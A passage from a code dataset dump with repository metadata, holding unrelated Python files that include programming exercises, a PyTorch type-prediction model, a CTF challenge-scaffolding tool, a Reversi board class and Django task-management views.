suf)\n","repo_name":"OMAS-IIIF/cserve","sub_path":"handlers/iiifhandler/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":14675,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"24636858656","text":"class Integer:\n def __init__(self, value: int):\n self.value = value\n\n @staticmethod\n def convert_from_roman(num):\n roman_numerals = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}\n result = 0\n for i, c in enumerate(num):\n if (i + 1) == len(num) or roman_numerals[c] >= roman_numerals[num[i + 1]]:\n result += roman_numerals[c]\n else:\n result -= roman_numerals[c]\n return result\n\n @classmethod\n def from_float(cls, value):\n if not type(value) == float:\n return \"value is not a float\"\n return cls(int(value))\n\n @classmethod\n def from_roman(cls, value):\n return cls(cls.convert_from_roman(value))\n\n @classmethod\n def from_string(cls, value):\n if type(value) == str and value.isnumeric():\n return cls(int(value))\n return \"wrong type\"\n\n\nfirst_num = Integer(10)\nsecond_num = Integer.from_roman(\"IV\")\n\nprint(Integer.from_float(\"2.6\"))\nprint(Integer.from_string(2.6))\n","repo_name":"iggeorgiev1979/Python_exercises","sub_path":"Python_OOP/Class_and_Static_Methods/Integer.py","file_name":"Integer.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"40398488529","text":"import torch\nimport torch.nn as nn\n\nfrom ncc.models import NccLanguageModel, register_model\nfrom ncc.models.type_prediction.encoder import CodeEncoder, CodeEncoderLSTM\nfrom ncc.modules.decoders.ncc_decoder import NccDecoder\n\n\n@register_model('typetransformer')\nclass TypeTransformer(NccLanguageModel):\n def __init__(self, args, encoder):\n super().__init__(encoder)\n self.args = args\n\n # We follow BERT's random weight initialization\n # self.apply(init_bert_params)\n\n self.classification_heads = nn.ModuleDict()\n\n @classmethod\n def build_model(cls, args, config, task):\n \"\"\"Build a new model instance.\"\"\"\n\n # make sure all arguments are present\n # base_architecture(args)\n\n # if not hasattr(args, 'max_positions'):\n if 'max_positions' not in args['model']:\n args['model']['max_positions'] = args['task']['tokens_per_sample']\n\n encoder = RobertaEncoder(args, task.source_dictionary, task.target_dictionary, encoder_type=args['model']['encoder_type'])\n return cls(args, encoder)\n\n def forward(self, src_tokens, **kwargs): #, features_only=False, return_all_hiddens=False, classification_head_name=None,\n # if classification_head_name is not None:\n # features_only = True\n #\n # x, extra = self.decoder(src_tokens, features_only, return_all_hiddens, **kwargs)\n #\n # if classification_head_name is not None:\n # x = self.classification_heads[classification_head_name](x)\n # return x, extra\n\n x = self.decoder(src_tokens, **kwargs)\n\n return x, None\n\n\nclass RobertaEncoder(NccDecoder):\n def __init__(\n self,\n args,\n source_dictionary,\n target_dictionary,\n # n_tokens,\n # n_output_tokens,\n d_model=512,\n d_rep=128,\n n_head=8,\n n_encoder_layers=6,\n d_ff=2048,\n dropout=0.0, # 0.1\n activation=\"relu\",\n norm=True,\n # pad_id=None,\n encoder_type=\"transformer\"\n ):\n # super(TypeTransformer, self).__init__()\n super().__init__(source_dictionary)\n self.args = args\n assert norm\n # assert pad_id is not None\n padding_idx = source_dictionary.pad()\n self.config = {k: v for k, v in locals().items() if k != \"self\"}\n\n # Encoder and output for type prediction\n assert (encoder_type in [\"transformer\", \"lstm\"])\n if encoder_type == \"transformer\":\n self.encoder = CodeEncoder(\n len(source_dictionary), d_model, d_rep, n_head, n_encoder_layers, d_ff, dropout, activation, norm, padding_idx, project=False\n )\n # TODO: Try LeakyReLU\n self.output = nn.Sequential(nn.Linear(d_model, d_model), nn.ReLU(), nn.Linear(d_model, len(target_dictionary)))\n elif encoder_type == \"lstm\":\n self.encoder = CodeEncoderLSTM(\n n_tokens=len(source_dictionary),\n d_model=d_model,\n d_rep=d_rep,\n n_encoder_layers=n_encoder_layers,\n dropout=dropout,\n pad_id=padding_idx,\n project=False\n )\n self.output = nn.Sequential(nn.Linear(d_model*2, d_model), nn.ReLU(), nn.Linear(d_model, len(target_dictionary)))\n\n def forward(self, src_tokens, src_length=None, output_attention=None):\n r\"\"\"\n Arguments:\n src_tok_ids: [B, L] long tensor\n output_attention: [B, L, L] float tensor\n \"\"\"\n if output_attention is not None and src_tokens.size(0) != output_attention.size(0):\n raise RuntimeError(\"the batch number of src_tok_ids and output_attention must be equal\")\n\n # Encode\n memory = self.encoder(src_tokens, src_length) # LxBxD\n memory = memory.transpose(0, 1) # BxLxD\n\n if output_attention is not None:\n # Aggregate features to the starting token in each labeled identifier\n memory = torch.matmul(output_attention, memory) # BxLxD\n\n # Predict logits over types\n return self.output(memory) # BxLxV\n","repo_name":"CGCL-codes/naturalcc","sub_path":"ncc/models/type_prediction/typetransformer.py","file_name":"typetransformer.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"53"} +{"seq_id":"72070796647","text":"# 给你两个链表 list1 和 list2 ,它们包含的元素分别为 n 个和 m 个。 \n# \n# 请你将 list1 中下标从 a 到 b 的全部节点都删除,并将list2 接在被删除节点的位置。 \n# \n# 下图中蓝色边和节点展示了操作后的结果: \n# \n# 请你返回结果链表的头指针。 \n# \n# \n# \n# 示例 1: \n# \n# \n# \n# \n# 输入:list1 = [0,1,2,3,4,5], a = 3, b = 4, list2 = [1000000,1000001,1000002]\n# 输出:[0,1,2,1000000,1000001,1000002,5]\n# 解释:我们删除 list1 中下标为 3 和 4 的两个节点,并将 list2 接在该位置。上图中蓝色的边和节点为答案链表。\n# \n# \n# 示例 2: \n# \n# \n# 输入:list1 = [0,1,2,3,4,5,6], a = 2, b = 5, list2 = [1000000,1000001,1000002,100\n# 0003,1000004]\n# 输出:[0,1,1000000,1000001,1000002,1000003,1000004,6]\n# 解释:上图中蓝色的边和节点为答案链表。\n# \n# \n# \n# \n# 提示: \n# \n# \n# 3 <= list1.length <= 10⁴ \n# 1 <= a <= b < list1.length - 1 \n# 1 <= list2.length <= 10⁴ \n# \n# \n# 👍 85 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeInBetween(self, list1: ListNode, a: int, b: int, list2: ListNode) -> ListNode:\n \"\"\"\n 方法1:遍历\n \"\"\"\n cur1, cur2 = list1, list2\n while cur2.next:\n cur2 = cur2.next\n\n i = 0\n while i != a-1:\n cur1 = cur1.next\n i += 1\n cut_head = cur1\n\n while i != b+1:\n cur1 = cur1.next\n i += 1\n cut_tail = cur1\n\n cut_head.next = list2\n cur2.next = cut_tail\n\n return list1\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[1669]合并两个链表.py","file_name":"[1669]合并两个链表.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73765820329","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 23 16:05:15 2020\r\n\r\n@author: MOHANA D\r\n\"\"\"\r\n\r\n\r\n#Write a program to check whether character is an alphabet or not using conditional operator.\r\nch = input(\"Please Enter Your Own Character : \")\r\n# isalpha() is built in function to check a character\r\nif(ch.isalpha()):\r\n print(\"Given Character \", ch, \"is an Alphabet\")\r\nelse:\r\n print(\"Given Character \", ch, \"is not an Alphabet\")","repo_name":"dasari-mohana-zz/Python_Assignments","sub_path":"charcod.py","file_name":"charcod.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19743181062","text":"import numpy as np\nfrom copy import deepcopy\nfrom scipy.interpolate import interp1d\nimport matplotlib.pyplot as plt\n\ndef approx_cdf_1d(x_array, pdf_array):\n \"\"\"\n\n :param x_array: x-values of pdf\n :param pdf_array: pdf array of given x-values\n \"\"\"\n norm_pdf = pdf_array / np.sum(pdf_array)\n cdf_array = np.zeros_like(norm_pdf)\n cdf_array[0] = norm_pdf[0]\n for i in range(1, len(norm_pdf)):\n cdf_array[i] = cdf_array[i - 1] + norm_pdf[i]\n cdf_func = interp1d(x_array, cdf_array)\n cdf_inv_func = interp1d(cdf_array, x_array)\n return cdf_array, cdf_func, cdf_inv_func\n\nclass ProbabilityDistribution(object):\n\n\n def __init__(self,distribution_type='',args={},Nsamples=int,decimals=int,**kwargs):\n\n self.decimals = decimals\n\n if distribution_type=='Uniform':\n self.draw = self.Uniform\n self.low,self.high = args['low'],args['high']\n\n elif distribution_type=='LogUniform':\n self.draw = self.LogUniform\n self.low,self.high = args['low'],args['high']\n\n elif distribution_type=='Gaussian':\n self.draw = self.Gaussian\n self.mean,self.sigma = args['mean'],args['sigma']\n self.positive_definite = args['positive_definite']\n\n elif distribution_type=='PDF':\n\n self.draw = self.InvertCDF\n\n sorted = np.argsort(args['values'])\n args['values'] = np.array(args['values'])\n args['pdf'] = np.array(args['pdf'])\n values = args['values'][sorted]\n pdf = args['pdf'][sorted]\n norm = np.max(pdf)\n\n self.values, self.pdf = values, pdf/norm\n\n else:\n raise Exception('distribution_type not recognized: ')\n\n if 'sort_ascending' in args:\n self.sort_ascending = True\n else:\n self.sort_ascending = False\n\n def InvertCDF(self, N):\n\n zmin, zmax = self.values[0], self.values[-1]\n\n pz = interp1d(self.values, self.pdf)\n samples = []\n while len(samples) urand:\n samples.append(zprop)\n\n return np.round(samples, self.decimals)\n\n def LogUniform(self, N):\n\n logsamples = np.random.uniform(self.low, self.high, N)\n if self.sort_ascending:\n logsamples = logsamples[np.argsort(logsamples)]\n\n samples = 10**logsamples\n\n return np.round(np.array(samples), self.decimals)\n\n def Uniform(self,N):\n\n samples = np.random.uniform(self.low,self.high,N)\n\n if self.sort_ascending:\n samples = samples[np.argsort(samples)]\n\n return np.round(np.array(samples),self.decimals)\n\n\n def Gaussian(self,N):\n\n samples = np.random.normal(self.mean,self.sigma,N)\n\n if self.positive_definite:\n samples = np.absolute(samples)\n\n if self.sort_ascending:\n samples = samples[np.argsort(samples)]\n\n return np.round(np.array(samples),self.decimals)\n\n","repo_name":"dangilman/MagniPy","sub_path":"MagniPy/ABCsampler/probability_distributions.py","file_name":"probability_distributions.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43087764964","text":"import ee\n\n\ndef landsat_bqa_cloud_mask_func(img):\n \"\"\"Extract Landsat Collection 1 cloud mask from the BQA band\n\n Parameters\n ----------\n img : ee.Image\n\n Returns\n -------\n ee.Image\n\n Notes\n -----\n Output image is structured to be applied directly with updateMask()\n i.e. 0 is cloud, 1 is cloud free\n\n https://landsat.usgs.gov/collectionqualityband\n https://code.earthengine.google.com/356a3580096cca315785d0859459abbd\n\n Confidence values\n 00 = \"Not Determined\" = Algorithm did not determine the status of this condition\n 01 = \"No\" = Algorithm has low to no confidence that this condition exists (0-33 percent confidence)\n 10 = \"Maybe\" = Algorithm has medium confidence that this condition exists (34-66 percent confidence)\n 11 = \"Yes\" = Algorithm has high confidence that this condition exists (67-100 percent confidence\n\n \"\"\"\n qa_img = ee.Image(img.select(['BQA']))\n\n # Extracting cloud masks from BQA using rightShift() and bitwiseAnd()\n # Cloud (med & high confidence), then snow, then shadow, then fill\n # Low confidence clouds tend to be the FMask buffer\n cloud_mask = qa_img.rightShift(4).bitwiseAnd(1).neq(0) \\\n .And(qa_img.rightShift(5).bitwiseAnd(3).gte(2)) \\\n .Or(qa_img.rightShift(7).bitwiseAnd(3).gte(3)) \\\n .Or(qa_img.rightShift(9).bitwiseAnd(3).gte(3)) \\\n .Or(qa_img.rightShift(11).bitwiseAnd(3).gte(3))\n\n return cloud_mask.Not()\n","repo_name":"pblankenau2/openet-core-beta","sub_path":"openet/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40446123087","text":"#*****************************************************\n#\n#Program Author: Frances Zhao\n#Completion Date: April 26th 2021\n#Program Name: Lesson 2_1\n#Description: prompting the user for the height and base length of a right angle triangle\n#Outputting the area of the triangle\n#\n#*****************************************************\n\n#variable declaration\nheight = float()\nbase = float()\n\n#prompting the user for the height and base of the triangle\nheight = float(input(\"Welcome to the right triangle area finder! Please enter the height of the triangle: \"))\nbase = float(input(\"Please enter the base length of the triangle: \"))\n\n#conversion rule to find area of triangle\narea = base * height / 2\n\n#outputting the area of the right angle triangle\nprint(\"The area of your triangle is \", area, \" units squared.\" )","repo_name":"frances-zhao/ICS207","sub_path":"homework/lesson 2/Lesson2_1.py","file_name":"Lesson2_1.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5248274774","text":"import sys;\ndef hanoiRecursive(disk,src,dest,aux):\n if len(src)==0 or disk<=0:\n return\n hanoiRecursive(disk-1,src,aux,dest)\n top = src.pop();dest.append(top)\n print(\"src :{} aux:{} dest:{}\".format(src,aux,dest))\n hanoiRecursive(disk-1,aux,dest,src)\n \ndef hanoiIterative(disk,src,dest,aux):\n totalmoves=(2**disk)-1;\n print(\"Total Moves : {}\".format(totalmoves))\n even=False\n if disk%2==0:\n temp=aux;\n aux=dest;\n dest=temp\n even=True\n mov=\"\"\n for i in range(1,totalmoves+1):\n if i%3 == 0:\n sit,top=move(aux,dest)\n if sit==1:\n mov=(\"Move {} from aux to dest\".format(top),\"Move {} from dest to aux\".format(top))[even]\n else:\n mov=(\"Move {} from dest to aux\".format(top),\"Move {} from aux to dest\".format(top))[even]\n if i%3 == 1:\n sit,top=move(src,dest)\n if sit==1:\n mov=(\"Move {} from src to dest\".format(top),\"Move {} from aux to src\".format(top))[even]\n else:\n mov=(\"Move {} from dest to src\".format(top),\"Move {} from src to aux\".format(top))[even]\n if i%3 == 2:\n sit,top=move(aux,src)\n if sit==1:\n mov=(\"Move {} from aux to src\".format(top),\"Move {} from dest to src\".format(top))[even]\n else:\n mov=(\"Move {} from src to aux\".format(top),\"Move {} from srx to dest\".format(top))[even]\n print(mov)\n\ndef move(pole1,pole2):\n if len(pole2)==0:\n temp=pole1.pop()\n pole2.append(temp)\n return (1,temp)\n elif len(pole1)==0:\n temp=pole2.pop()\n pole1.append(temp)\n return (2,temp)\n elif pole1[-1]\n├── dist\n│ └── \n├── service\n│ └── \n│ ├── dockerfile\n│ └── \n├── solution\n│ ├── writeup.md\n│ └── \n├── chall.yaml\n└── README.md\n\"\"\"\n\nfrom __future__ import annotations\n\nimport shutil\nfrom pathlib import Path\nfrom typing import TypedDict\n\nfrom yaml import safe_dump\n\nfrom ctf_architect.core.models import ChallengeInfo, Flag, Hint, Service\n\n\nclass ServiceDict(TypedDict):\n name: str\n path: str\n port: int\n\n\nREADME_TEMPLATE = \"\"\"# {name}\n{description}\n\n## Summary\n- **Author:** {author}\n- **Discord Username:** {discord}\n- **Category:** {category}\n- **Difficulty:** {difficulty}\n\n## Hints\n{hints}\n\n## Files\n{files}\n\n## Services\n{services}\n\n## Flags\n{flags}\n\"\"\"\n\n\ndef create_challenge_readme(info: ChallengeInfo) -> str:\n \"\"\"\n Creates a README.md file for a challenge.\n \"\"\"\n flags = \"\\n\".join([\n f\"- `{flag.flag}` ({'regex' if flag.regex else 'static'})\"\n for flag in info.flags\n ])\n \n if info.hints is None:\n hints = \"None\"\n else:\n hints = \"\\n\".join([f\"- `{hint.description}` ({hint.cost} points)\" for hint in info.hints])\n \n if info.files is None:\n files = \"None\"\n else:\n files = \"\"\n for file in info.files:\n path = Path(file)\n files += f\"- [`{path.name}`]({path})\\n\"\n \n if info.services is None:\n services = \"None\"\n else:\n services = \"\"\n for service in info.services:\n services += f\"- [`{service.name}`]({service.path}) (port {service.port})\\n\"\n \n return README_TEMPLATE.format(\n name=info.name,\n description=info.description,\n author=info.author,\n discord=info.discord,\n category=info.category,\n difficulty=info.difficulty,\n hints=hints,\n files=files,\n services=services,\n flags=flags\n )\n\n\ndef create_challenge_folder(name: str, dist: bool = False, service: bool = False) -> Path:\n \"\"\"\n Creates a folder with the challenge template.\n \"\"\"\n challenge_path = Path(name)\n challenge_path.mkdir(exist_ok=True)\n\n if dist:\n (challenge_path / \"dist\").mkdir(exist_ok=True)\n\n if service:\n (challenge_path / \"service\").mkdir(exist_ok=True)\n\n (challenge_path / \"solution\").mkdir(exist_ok=True)\n\n # Create empty files\n (challenge_path / \"chall.yaml\").touch()\n (challenge_path / \"README.md\").touch()\n\n return challenge_path\n\n\n\ndef create_challenge(\n name: str,\n description: str,\n difficulty: str,\n category: str,\n author: str,\n discord: str,\n solution_files: list[Path],\n flag: str = None,\n flags: list[dict[str, str | bool]] = None,\n hints: dict[str, str | int] = None,\n files: list[Path] = None,\n requirements: list[str] = None,\n services: list[ServiceDict] = None\n) -> Path:\n \"\"\"\n Creates a folder with the challenge template.\n\n Parameters\n ----------\n name : str\n The name of the challenge.\n description : str\n The description of the challenge.\n difficulty : str\n The difficulty of the challenge.\n category : str\n The category of the challenge.\n author : str\n The author of the challenge.\n discord : str\n The discord of the author.\n flag : str, optional\n The flag of the challenge.\n flags : list[dict[str, str | bool]], optional\n The flags of the challenge.\n hints : dict[str, str | int], optional\n The hints of the challenge.\n files : list[Path], optional\n Paths to the files that should be given to participants\n requirements : list[str], optional\n The requirements of the challenge.\n services : list[ServiceDict], optional\n The services of the challenge.\n\n Returns\n -------\n Path\n The path to the challenge folder.\n \"\"\"\n\n if flag is None and flags is None:\n raise ValueError(\"Must specify either flag or flags\")\n elif flag is not None and flags is not None:\n raise ValueError(\"Cannot specify both flag and flags\")\n \n if flag is not None:\n flags = [Flag(flag=flag)]\n\n if flags is not None:\n flags = [Flag(**flag) for flag in flags]\n\n if hints is not None:\n hints = [Hint(**hint) for hint in hints]\n \n dist = files is not None\n service = services is not None\n\n path = create_challenge_folder(name, dist=dist, service=service)\n\n if files is not None:\n # Copy files to dist folder\n file_paths = []\n for file in files:\n file_path = shutil.copy(file, path / \"dist\")\n file_path = Path(file_path).relative_to(path)\n file_paths.append(file_path.as_posix())\n else:\n file_paths = None\n\n if services is not None:\n # Copy services to service folder\n service_objs = []\n for service in services:\n service_path = path / \"service\" / service[\"name\"]\n shutil.copytree(service[\"path\"], service_path)\n service_obj = Service(service[\"name\"], path=service_path.relative_to(path).as_posix(), port=str(service[\"port\"]))\n service_objs.append(service_obj)\n else:\n service_objs = None\n\n # Copy solution files to solution folder\n for file in solution_files:\n shutil.copy(file, path / \"solution\")\n\n # Create challenge info\n info = ChallengeInfo(\n name=name,\n description=description,\n difficulty=difficulty,\n category=category,\n author=author,\n discord=discord,\n flags=flags,\n hints=hints,\n files=file_paths,\n requirements=requirements,\n services=service_objs\n )\n\n # Save challenge info in chall.yaml\n safe_dump(info.to_dict(), (path / \"chall.yaml\").open(\"w\"))\n\n # Create README.md\n (path / \"README.md\").write_text(create_challenge_readme(info))\n\n return path","repo_name":"Jus-Codin/CTF-Architect","sub_path":"ctf_architect/chall_architect/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":5613,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"69823134569","text":"\"\"\"Represents the Board of a Reversi game.\"\"\"\nimport json\nimport logging\n\n\nclass Square(object):\n \"\"\"Enum to differentiate between teams.\n\n Note: We don't extend from enum to allow for easy serialization.\n \"\"\"\n white = 0\n black = 1\n blank = 2\n\n\nclass Board(object):\n \"\"\"Represents the board of a reversi game.\"\"\"\n\n def __init__(self, size, board, turn):\n if size:\n self.board = [[Square.blank for _ in range(size)] for _ in range(size)]\n self.board[size/2][size/2] = self.board[size/2-1][size/2-1] = Square.white\n self.board[size/2][size/2-1] = self.board[size/2-1][size/2] = Square.black\n else:\n self.board = board\n self.turn = turn\n\n # Creating a new board\n @classmethod\n def makeboard(cls, size):\n return cls(size, None, Square.white)\n\n # Creating a board in progress\n @classmethod\n def remakeboard(cls, board, turn):\n return cls(None, board, turn)\n\n def to_json(self):\n \"\"\"Converts the board to json.\"\"\"\n return json.dumps(self.board)\n\n @staticmethod\n def from_json(data, turn):\n \"\"\"Parses a json board and returns a new Board object.\n\n Args:\n data: (str) The board, encoded as json.\n turn: (Square) The team set to move next\n\n Returns:\n Board: The recreated board.\n \"\"\"\n return Board.remakeboard(json.loads(data), turn)\n\n def get_size(self):\n \"\"\"Gets the size of a board side.\"\"\"\n return len(self.board)\n\n def get_num_moves(self):\n \"\"\"Gets the number of moves made in the game.\"\"\"\n return len(self.board) * len(self.board) - 4 - self.get_squares_left()\n\n def get_squares_left(self):\n \"\"\"Gets the number of blank squares on the board.\"\"\"\n remaining = 0\n for r in self.board:\n for c in r:\n if c == Square.blank:\n remaining += 1\n return remaining\n\n def get_turn(self):\n \"\"\"Returns whose turn it is.\"\"\"\n return self.turn\n\n def add_piece(self, r, c, team):\n \"\"\"Validates input and addes a piece to the board.\n\n Args:\n r: (int) The row.\n c: (int) The column.\n team: (Square) The team making the move.\n\n Returns:\n int: The number of points scored by the move\n \"\"\"\n if not self._validate_input(r, c, team):\n return 0\n points = self._flip(r, c, self.turn)\n if points == 0:\n logging.info('Illegal move r%sc%s: no points', r, c)\n return 0\n self.board[r][c] = self.turn\n self._set_next_turn()\n return points\n\n def _validate_input(self, r, c, team):\n \"\"\"Ensures move input is a legal move.\n\n Args:\n r: (int) The row.\n c: (int) The column.\n team: (Square) The team making the move.\n\n Returns:\n bool: the legality of the move\n \"\"\"\n if r < 0 or r >= len(self.board) or c < 0 or c >= len(self.board):\n logging.error('Move r%sc%s not in range 0, %s', r, c, len(self.board))\n elif self.turn != team:\n logging.info('Bad Move by player%s: Not your turn', team + 1)\n elif self.board[r][c] != Square.blank:\n logging.info('Bad Move r%sc%s: Not a blank square', r, c)\n else:\n return True\n return False\n\n def _set_next_turn(self):\n \"\"\"Determines if players can move and sets the next turn.\"\"\"\n\n # Check if each player can move\n cur_turn = self.turn\n self.turn = Square.black\n black_able = self.can_move(Square.black)\n self.turn = Square.white\n white_able = self.can_move(Square.white)\n self.turn = cur_turn\n if not black_able and not white_able:\n logging.info('No more legal moves')\n self.turn = Square.blank\n\n # Set next turn\n if self.turn == Square.white:\n self.turn = Square.black\n # Break up if statements so that our checks pass validate_input\n if not black_able:\n self.turn = Square.white\n elif self.turn == Square.black:\n self.turn = Square.white\n # Break up if statements so that our checks pass validate_input\n if not white_able:\n self.turn = Square.black\n\n # Method wrapper for flipping\n def _flip(self, r, c, team):\n return self._validate_flip(r, c, team, True, True)\n\n # Method wrapper for getting score of a potential flip\n def flip_score(self, r, c, team):\n if self._validate_input(r, c, team):\n return self._validate_flip(r, c, team, False, True)\n return 0\n\n # Method wrapper for seeing if move is legal. Returns Boolean\n def can_flip(self, r, c, team):\n logging.getLogger().setLevel(logging.ERROR) # Don't log validation errors\n if (self._validate_input(r, c, team) and\n self._validate_flip(r, c, team, False, False)):\n logging.getLogger().setLevel(logging.DEBUG)\n return True\n logging.getLogger().setLevel(logging.DEBUG)\n return False\n\n # Internal method for flipping pieces\n # Assumes everything has been validated\n def _flip_pieces(self, pieces):\n for piece in pieces:\n if self.board[piece[0]][piece[1]] == Square.white:\n self.board[piece[0]][piece[1]] = Square.black\n else:\n self.board[piece[0]][piece[1]] = Square.white\n\n # Internal method for determining move legality and score\n def _validate_flip(self, r, c, team, should_flip, keep_score):\n \"\"\"Handles validating moves and flipping pieces.\n\n Args:\n r: (int) The row we're placing a piece.\n c: (int) The column we're placing a piece.\n team: (Square) The team placing the piece.\n should_flip: (bool) Should we actually flip the pieces or just check move?\n keep_score: (bool) Are we checking legality or score?\n\n Returns:\n int: The move's score (or 1 for score >= 1 if keep_score is false)\n \"\"\"\n flip_pieces = []\n # Search each direction on the board\n for dr in xrange(-1, 2):\n for dc in xrange(-1, 2):\n if dr == 0 and dc == 0:\n continue\n cur_r = r + dr\n cur_c = c + dc\n found_other = False\n while (cur_r < len(self.board) and cur_r >= 0 and\n cur_c < len(self.board[0]) and cur_c >= 0):\n if self.board[cur_r][cur_c] == Square.blank:\n break\n elif self.board[cur_r][cur_c] == team:\n # If we found the other player in between, flip. Otherwise break\n if found_other:\n if keep_score:\n # Calculate all the flipped pieces\n mv_r = -1 * dr\n mv_c = -1 * dc\n while cur_r + mv_r != r or cur_c + mv_c != c:\n cur_r += mv_r\n cur_c += mv_c\n flip_pieces.append([cur_r, cur_c])\n else:\n # If we're checking that this square has a legal move, it does\n return 1\n break\n else:\n found_other = True\n cur_r += dr\n cur_c += dc\n\n # Remove duplicate squares\n flip_set = set(tuple(i) for i in flip_pieces)\n if should_flip:\n self._flip_pieces(flip_set)\n return len(flip_set)\n\n def can_move(self, team):\n \"\"\"Determines if the given team has a valid move.\n\n Args:\n team: (Square) The team.\n\n Returns:\n bool: If the team has a valid move\n \"\"\"\n for r in xrange(0, len(self.board)):\n for c in xrange(0, len(self.board)):\n if self.can_flip(r, c, team):\n return True\n return False\n\n# Count Squares on a full board to determine the winner\n def who_won(self):\n \"\"\"Counts the squares on a board to determine the winner.\n\n Returns:\n Square: The winning team.\n \"\"\"\n white_advantage = 0\n\n if self.turn != Square.blank:\n return -1\n for r in xrange(len(self.board)):\n for c in xrange(len(self.board)):\n if self.board[r][c] == Square.white:\n white_advantage += 1\n elif self.board[r][c] == Square.black:\n white_advantage -= 1\n if white_advantage == 0:\n return Square.blank\n elif white_advantage > 0:\n return Square.white\n else:\n return Square.black\n\n # Count number of pieces that belong to the given team\n def num_pieces(self, team):\n pieces = 0\n for r in xrange(len(self.board)):\n for c in xrange(len(self.board)):\n if self.board[r][c] == team:\n pieces += 1\n return pieces\n\n","repo_name":"Benjamin-Marks/reversi","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":8100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15162242876","text":"from datetime import datetime\nfrom dateutil import tz\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.views import LoginView\nfrom django.db import transaction\nfrom django.forms import ModelForm\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import redirect, render\nfrom django.views import View\nfrom django.views.generic import ListView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.edit import CreateView, DeleteView, UpdateView\n\nfrom tasks.models import *\n\nTIMEZONE = [tz for tz in pytz.all_timezones]\n\nclass AuthorisedTaskManager(LoginRequiredMixin):\n def get_queryset(self):\n return Task.objects.filter(deleted=False, user=self.request.user)\n\n\nclass UserLoginView(LoginView):\n template_name = \"user_login.html\"\n\n\nclass UserCreateView(CreateView):\n form_class = UserCreationForm\n template_name = \"user_create.html\"\n success_url = \"/user/login/\"\n\n\ndef session_storage_view(request):\n total_views = request.session.get(\"total_views\", 0)\n request.session[\"total_views\"] = total_views + 1\n return HttpResponse(f\"Total views: {total_views} and user is {request.user}\")\n\n\nclass GenericTaskDeleteView(AuthorisedTaskManager, DeleteView):\n model = Task\n template_name = \"task_delete.html\"\n success_url = \"/tasks\"\n\n\nclass GenericTaskDetailView(AuthorisedTaskManager, DetailView):\n model = Task\n template_name = \"task_detail.html\"\n\n\nclass GenericTaskUpdateView(AuthorisedTaskManager, UpdateView):\n model = Task\n template_name = \"task_update.html\"\n fields = [\"title\", \"description\", \"priority\", \"completed\", \"status\"]\n success_url = \"/tasks\"\n\n def form_valid(self, form):\n # print(form.cleaned_data)\n self.object = form.save()\n self.object.user = self.request.user\n priority = self.object.priority\n tasks = (\n Task.objects.filter(\n priority__gte=priority,\n user=self.request.user,\n deleted=False,\n completed=False,\n )\n .select_for_update()\n .order_by(\"priority\")\n )\n\n for task in tasks:\n if task.priority <= priority:\n task.priority += 1\n priority += 1\n\n Task.objects.bulk_update(tasks, [\"priority\"])\n self.object.save()\n print(self.object)\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass GenericTaskCreateView(CreateView):\n model = Task\n fields = (\"title\", \"description\", \"priority\", \"completed\", \"status\")\n template_name = \"task_create.html\"\n success_url = \"/tasks\"\n\n def form_valid(self, form):\n self.object = form.save()\n self.object.user = self.request.user\n priority = self.object.priority\n tasks = (\n Task.objects.filter(\n priority__gte=priority,\n user=self.request.user,\n deleted=False,\n completed=False,\n )\n .select_for_update()\n .order_by(\"priority\")\n )\n\n for task in tasks:\n if task.priority <= priority:\n task.priority += 1\n priority += 1\n\n Task.objects.bulk_update(tasks, [\"priority\"])\n self.object.save()\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass GenericTaskView(LoginRequiredMixin, ListView):\n queryset = Task.objects.filter(deleted=False)\n template_name = \"tasks.html\"\n context_object_name = \"tasks\"\n\n def get_queryset(self):\n search_term = self.request.GET.get(\"search\")\n tasks = Task.objects.filter(deleted=False, user=self.request.user)\n completed = Task.objects.filter(\n deleted=False, user=self.request.user, completed=True\n )\n if search_term:\n tasks = tasks.filter(title__icontains=search_term)\n return tasks, completed\n\n\nclass EmailTaskView(LoginRequiredMixin, View):\n def get(self, request, *args, **kwargs):\n mail = self.request.user.email\n time = (\n EmailReport.objects.get(user=self.request.user).time\n if EmailReport.objects.filter(user=self.request.user).exists()\n else None\n )\n timezone = (\n EmailReport.objects.get(user=self.request.user).time_zone\n if EmailReport.objects.filter(user=self.request.user).exists()\n else 'UTC'\n )\n if timezone != 'UTC':\n # convert time to UTC\n print(time)\n time = str(time)\n time = 